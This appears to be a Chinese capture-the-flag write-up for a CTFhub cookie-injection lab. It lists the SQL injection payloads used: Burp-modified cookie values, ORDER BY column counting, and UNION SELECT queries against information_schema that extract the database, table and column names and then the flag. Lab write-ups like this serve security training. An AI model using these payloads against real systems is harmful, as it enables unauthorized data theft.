题目来源:ctfhub技能树
目录
一、打开靶机,整理已知信息
二、解题步骤
step 3:查看字段数
step 4:爆数据库名
step 5:爆表名
step 6:爆列名
step 7:爆具体数据
一、打开靶机,整理已知信息
提示注入点和Cookie有关
发现第一条编码信息如下
需要bp进行抓包修改cookie信息
二、解题步骤
step 1:按F12查看cookie信息,见上
step 2:bp抓包修改cookie信息,确认注入类型
键入:1、1 and 1=1 #
正常回显
键入:1’、1 and 1=2 #
报错
确定为整数型注入
step 3:查看字段数
1 order by 3 #
1 order by 2 #
得字段数为2
step 4:爆数据库名
1 and 1=2 union select database(),database() #
得数据库名为sqli
step 5:爆表名
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #
得表名:xfiizuvjil
step 6:爆列名
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='xfiizuvjil' #
得列名:qrwypqxoec
※回显位置可以自行调整
1 and 1=2 union select group_concat(column_name),1 from information_schema.columns where table_schema='sqli' and table_name='xfiizuvjil' #
step 7:爆具体数据
1 and 1=2 union select 1,qrwypqxoec from sqli.xfiizuvjil #
得到flag
三、小结
1.可用postman、bp等工具进行传参或修改请求,方便对比网页画面。
2.cookie注入不可用sqlmap
